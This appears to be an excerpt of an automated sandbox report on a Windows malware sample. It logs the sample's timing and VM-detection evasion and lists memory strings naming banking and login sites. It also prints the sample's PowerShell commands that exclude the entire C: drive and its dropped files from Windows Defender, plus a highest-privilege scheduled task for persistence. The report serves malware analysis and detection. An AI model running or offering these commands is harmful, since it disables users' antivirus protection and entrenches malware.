                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9032Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8800Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8552Thread sleep count: 2252 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9100Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8904Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8360Thread sleep count: 1607 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9116Thread sleep time: -1844674407370954s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8848Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8512Thread sleep count: 1365 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9144Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8864Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8400Thread sleep count: 1378 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9020Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8696Thread sleep time: -1844674407370954s >= -30000s
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe TID: 9148Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe TID: 7748Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 5656Thread sleep time: -30000s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -33204139332677172s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -600000s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -599843s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -599625s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -598718s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -598524s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -598234s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -598077s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 8412Thread sleep time: -18000000s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -597718s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -597541s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -597404s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -597275s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -597153s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -597046s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -596933s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -596813s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -596557s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -596015s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -595825s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -595640s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -595468s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -595265s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -595120s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -594988s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -594859s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -594723s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -594598s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -594468s >= -30000s
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe TID: 8668Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe TID: 8704Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\svchost.exe TID: 4816Thread sleep time: -30000s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6784Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe TID: 8952Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 4404Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe File Volume queried: C:\ FullSizeInformation
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe File Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe File Volume queried: C:\ FullSizeInformation
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe Thread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Thread delayed: delay time: 922337203685477
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Thread delayed: delay time: 30000
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Thread delayed: delay time: 922337203685477
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Thread delayed: delay time: 600000
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Thread delayed: delay time: 599843
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Thread delayed: delay time: 599625
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Thread delayed: delay time: 598718
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Thread delayed: delay time: 598524
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Thread delayed: delay time: 598234
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Thread delayed: delay time: 598077
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Thread delayed: delay time: 3600000
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Thread delayed: delay time: 597718
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Thread delayed: delay time: 597541
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Thread delayed: delay time: 597404
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Thread delayed: delay time: 597275
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Thread delayed: delay time: 597153
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Thread delayed: delay time: 597046
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Thread delayed: delay time: 596933
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Thread delayed: delay time: 596813
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Thread delayed: delay time: 596557
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Thread delayed: delay time: 596015
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Thread delayed: delay time: 595825
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Thread delayed: delay time: 595640
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Thread delayed: delay time: 595468
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Thread delayed: delay time: 595265
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Thread delayed: delay time: 595120
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Thread delayed: delay time: 594988
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Thread delayed: delay time: 594859
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Thread delayed: delay time: 594723
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Thread delayed: delay time: 594598
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe Thread delayed: delay time: 594468
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe File opened: C:\Users\user\Documents\desktop.ini
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe File opened: C:\Users\user
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe File opened: C:\Users\user\AppData\Local\Temp
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe File opened: C:\Users\user\AppData
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe File opened: C:\Users\user\AppData\Local
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe File opened: C:\Users\user\Desktop\desktop.ini
                            Source: qfrwB6ToHg.71.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
                            Source: qfrwB6ToHg.71.dr Binary or memory string: discord.comVMware20,11696428655f
                            Source: qfrwB6ToHg.71.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
                            Source: qfrwB6ToHg.71.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                            Source: 9XHFe6y4Dj.exe, tqeRXJHxPWPPoiNqjJeEYdv.exe.0.dr, tqeRXJHxPWPPoiNqjJeEYdv.exe0.0.dr, tqeRXJHxPWPPoiNqjJeEYdv.exe2.0.dr Binary or memory string: D7HGfSY2GpSdG7fwcUn2
                            Source: qfrwB6ToHg.71.dr Binary or memory string: global block list test formVMware20,11696428655
                            Source: qfrwB6ToHg.71.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
                            Source: qfrwB6ToHg.71.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                            Source: qfrwB6ToHg.71.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                            Source: qfrwB6ToHg.71.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
                            Source: 9XHFe6y4Dj.exe, 00000000.00000002.2502998988.000000001BBA2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}6
                            Source: qfrwB6ToHg.71.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                            Source: qfrwB6ToHg.71.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
                            Source: qfrwB6ToHg.71.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                            Source: qfrwB6ToHg.71.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                            Source: qfrwB6ToHg.71.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
                            Source: qfrwB6ToHg.71.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                            Source: w32tm.exe, 00000046.00000002.2304403259.0000014CECAC7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: qfrwB6ToHg.71.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                            Source: qfrwB6ToHg.71.dr Binary or memory string: outlook.office.comVMware20,11696428655s
                            Source: qfrwB6ToHg.71.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                            Source: qfrwB6ToHg.71.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
                            Source: qfrwB6ToHg.71.dr Binary or memory string: AMC password management pageVMware20,11696428655
                            Source: qfrwB6ToHg.71.dr Binary or memory string: tasks.office.comVMware20,11696428655o
                            Source: qfrwB6ToHg.71.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                            Source: qfrwB6ToHg.71.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
                            Source: qfrwB6ToHg.71.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
                            Source: 9XHFe6y4Dj.exe, 00000000.00000002.2502998988.000000001BB70000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                            Source: qfrwB6ToHg.71.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                            Source: qfrwB6ToHg.71.dr Binary or memory string: dev.azure.comVMware20,11696428655j
                            Source: qfrwB6ToHg.71.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
                            Source: qfrwB6ToHg.71.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
                            Source: 9XHFe6y4Dj.exe, tqeRXJHxPWPPoiNqjJeEYdv.exe.0.dr, tqeRXJHxPWPPoiNqjJeEYdv.exe0.0.dr, tqeRXJHxPWPPoiNqjJeEYdv.exe2.0.dr Binary or memory string: fCp1CaYdjaLhGFsOu6UZ
                            Source: qfrwB6ToHg.71.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
                            Source: qfrwB6ToHg.71.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                            Source: qfrwB6ToHg.71.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Process information queried: ProcessInformation
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Process token adjusted: Debug
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe Process token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Memory allocated: page read and write | page guard

                            HIPS / PFW / Operating System Protection Evasion

                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows mail\tqeRXJHxPWPPoiNqjJeEYdv.exe'
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\tqeRXJHxPWPPoiNqjJeEYdv.exe'
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Defender\Platform\tqeRXJHxPWPPoiNqjJeEYdv.exe'
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe'
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9XHFe6y4Dj.exe'
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tmiybkuk\tmiybkuk.cmdline"
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hbljmznv\hbljmznv.cmdline"
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9645.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCBECAF1EB4DD4ACB9C3DAD38B7F1421.TMP"
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "9XHFe6y4Dj9" /sc MINUTE /mo 8 /tr "'C:\Users\user\Desktop\9XHFe6y4Dj.exe'" /rl HIGHEST /f
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9XHFe6y4Dj.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\lE7emhVBWP.bat" Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9645.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCBECAF1EB4DD4ACB9C3DAD38B7F1421.TMP"Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES97EB.tmp" "c:\Windows\System32\CSC6D484021F1A3499F944D7EA066CF3EF7.TMP"Jump to behavior
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\Desktop\9XHFe6y4Dj.exe "C:\Users\user\Desktop\9XHFe6y4Dj.exe"
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Queries volume information: C:\Users\user\Desktop\9XHFe6y4Dj.exe VolumeInformation
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe Queries volume information: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
